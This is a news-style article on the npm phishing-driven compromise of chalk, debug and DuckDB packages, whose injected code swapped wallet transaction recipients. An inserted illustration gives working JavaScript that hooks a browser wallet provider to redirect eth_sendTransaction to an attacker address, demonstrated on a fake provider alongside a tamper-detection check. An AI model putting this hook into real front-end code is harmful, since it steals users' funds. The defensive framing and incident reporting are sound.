What has been described as the largest supply-chain attack in npm's history reached roughly 10% of cloud environments after attackers took over maintainer Josh Junon's npm account through a phishing campaign, yet it earned the perpetrators almost nothing.
The attack began when Junon fell for a password-reset phishing lure, giving the threat actors access to his npm account and letting them publish malicious versions of widely used packages, including chalk and debug, which together see more than 2.6 billion weekly downloads. The injected code was a cryptocurrency stealer: when the compromised packages were bundled into a web front-end, it rewrote Ethereum and Solana transactions so that funds went to attacker-controlled wallets.
The compromise's reach was staggering, with Wiz security researchers finding that the targeted packages served as fundamental building blocks in 99% of cloud environments. During the two-hour window before discovery and removal, the malicious packages were downloaded by roughly 10% of cloud environments, demonstrating the rapid propagation potential of supply-chain attacks.
Despite the enormous scale and reach, the attackers' financial gains were modest. Security Alliance's analysis found that the malicious code only ran in browser environments, where it hooked wallet transaction and signing requests and swapped the recipient address for an attacker-controlled one (an address-swapping "clipper", not cryptomining). In the first accounting the attackers had stolen about five cents worth of ETH and roughly $20 of an obscure memecoin.
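The hooking described above, as an added illustration that is not the malware's code and not taken from the article: a minimal model of an in-page hook on an EIP-1193 wallet provider (the `window.ethereum.request` interface), which rewrites the `to` field of every `eth_sendTransaction` before the wallet extension sees it, together with a baseline-identity check that shows why the swap is detectable from inside the page. The provider object and both addresses are constructed for the demo.

```javascript
// Added example, not the malware's code and not from the article or the
// affected projects. Models how an in-page "clipper" hooks an EIP-1193
// provider and how a baseline comparison detects the hook.

// Constructed stand-in for window.ethereum: records every transaction it
// is asked to send so the demo can inspect what the "wallet" received.
function makeFakeProvider() {
  const sent = [];
  return {
    sent,
    request({ method, params }) {
      if (method === "eth_sendTransaction") sent.push(params[0]);
      return Promise.resolve("0x" + "00".repeat(32)); // fake tx hash
    },
  };
}

// Attacker-style hook: wraps provider.request and replaces the `to` field
// of every eth_sendTransaction. The wallet extension prompts the user to
// sign whatever it receives, so the user approves a transfer to the
// attacker unless they re-read the address in the wallet prompt.
function installAddressSwapHook(provider, attackerAddress) {
  const original = provider.request.bind(provider);
  provider.request = function (args) {
    if (args && args.method === "eth_sendTransaction" && Array.isArray(args.params)) {
      const tx = { ...args.params[0], to: attackerAddress };
      return original({ ...args, params: [tx, ...args.params.slice(1)] });
    }
    return original(args);
  };
}

// Defensive check: capture the provider's request function when the page
// first loads, then compare later. A hook installed afterwards by any
// bundled dependency replaces the function object, so identity differs.
function captureBaseline(provider) {
  return provider.request;
}
function isProviderTampered(provider, baseline) {
  return provider.request !== baseline;
}

// Drives the model end to end and returns the observable results.
function demo() {
  const attacker = "0x000000000000000000000000000000000000dead"; // constructed
  const merchant = "0x1111111111111111111111111111111111111111"; // constructed
  const provider = makeFakeProvider();
  const baseline = captureBaseline(provider);

  provider.request({ method: "eth_sendTransaction", params: [{ to: merchant, value: "0x1" }] });
  const beforeHook = provider.sent[0].to;

  installAddressSwapHook(provider, attacker);
  provider.request({ method: "eth_sendTransaction", params: [{ to: merchant, value: "0x1" }] });
  const afterHook = provider.sent[1].to;

  return { beforeHook, afterHook, tampered: isProviderTampered(provider, baseline) };
}

console.log(demo());
```

The baseline check only helps if it runs before any third-party bundle code, and it says nothing about hooks installed lower in the stack (inside the wallet extension itself); the reliable user-side defence is to verify the recipient address in the wallet's confirmation prompt rather than in the dApp's UI.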
Socket researchers later widened the investigation and found that the same phishing campaign had compromised a DuckDB maintainer's npm account, with the same crypto-stealing code published under that project's packages. Their accounting across all attacker wallets came to roughly $429 in Ethereum, $46 in Solana, and small amounts of Bitcoin, Tron, Bitcoin Cash, and Litecoin, about $600 in total.
That the payload targeted only cryptocurrency transactions is likely what kept the incident from becoming far worse. With the ability to publish arbitrary code into packages installed billions of times a week, the attackers could instead have shipped reverse shells, tooling for lateral movement inside networks, or destructive malware.
Companies still spent many hours on cleanup, rebuilding, and security audits after the incident, but the direct security impact was minimal. The attacker wallets holding the bulk of the stolen funds have been flagged by blockchain security services, which further limits the perpetrators' ability to cash out even their meager gains.
This incident highlights both the vulnerability of open-source ecosystems to social engineering attacks and the potential for widespread impact even when financial motivation proves unsuccessful.